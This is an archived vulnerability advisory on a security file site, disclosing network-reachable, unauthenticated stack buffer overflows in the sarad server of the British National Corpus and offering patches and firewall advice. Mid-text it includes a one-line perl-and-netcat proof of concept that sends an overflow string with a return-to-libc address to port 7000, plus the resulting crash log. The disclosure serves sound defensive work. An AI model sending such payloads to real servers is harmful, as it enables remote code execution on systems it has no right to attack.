exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sarad.txt

sarad.txt
Posted Aug 24, 2004
Authored by Matthias Bethke

The sarad program used at the British National Corpus is susceptible to multiple buffer overflows. No authentication is required to perform the attack and they are network based.

tags | advisory, overflow
SHA-256 | 3b5dbe5c14fa19bf31747e7ab1ad0dfe738810272c2dbce61216a3114a9177e7

sarad.txt

Change Mirror Download
I have found several buffer overflows in the sarad program used to serve
the British National Corpus (http://www.natcorp.ox.ac.uk/SARA/). At
least one (I didn't check the others too closely) allows execution of
arbitrary code over the network with the rights of the daemon which is
supposed to be a dedicated low-rights account but I have seen to be root
in places. No authentication is required to perform an attack, so the
risk is quite high.

The British National Corpus is used by many linguists for research on
the English language and is licensed commercially by the BNC Consortium.
The server software run on various flavors of Unix and is freely
available in source form from http://www.natcorp.ox.ac.uk/SARA/ while
the client is a Win32 program (apparently, the server can be compiled
for Windows too, but I haven't checked this). The server implements its
own access control system, therefore its port (7000 by default) is
usually not protected by additional measures such as iptables rules.

The bugs are classic examples of buffers on the stack that get copied
into without bounds checking and thus allows overwriting the return
address. The following perl snippet does a return-to-libc on Linux
2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog():

perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \
| netcat victim 7000

The result:
Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan
Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKÛ@
Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority: 80e5540
Aug 19 20:50:05 drgonzo sarad[6519]:P^F
Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519
Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal 11

Possible solution: patch the source. I fixed the most glaring bugs,
checking array bounds, using strncpy() and snprintf() instead of their
unbounded counterparts, the usual stuff. Actually, even though the last
program version is from 2001, most of the code dates back to the mid-90s
and is a mess that dearly needs rewriting. So I'd suggest not to trust
the builtin access control either, but restrict access to the port as
much as possible using firewalls, iptables or similar measures.

There are two patches available from my homepage: one that should be
suitable for all systems and fixes the abovementioned bugs, and one that
does the same and also lets sarad automatically chroot itself to the
corpus directory and drops rights to a specified account. The latter
will probaby not compile on Windows. So even if there are dangerous
buffer overflows left in the code, which I think is almost certain, you
will not open your entire system to an attacker.
You can get the patches, including fairly simple installation
instructions, from
http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz
(signature: .../sara-fix.tar.gz.sig)

cheers!
Matthias
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close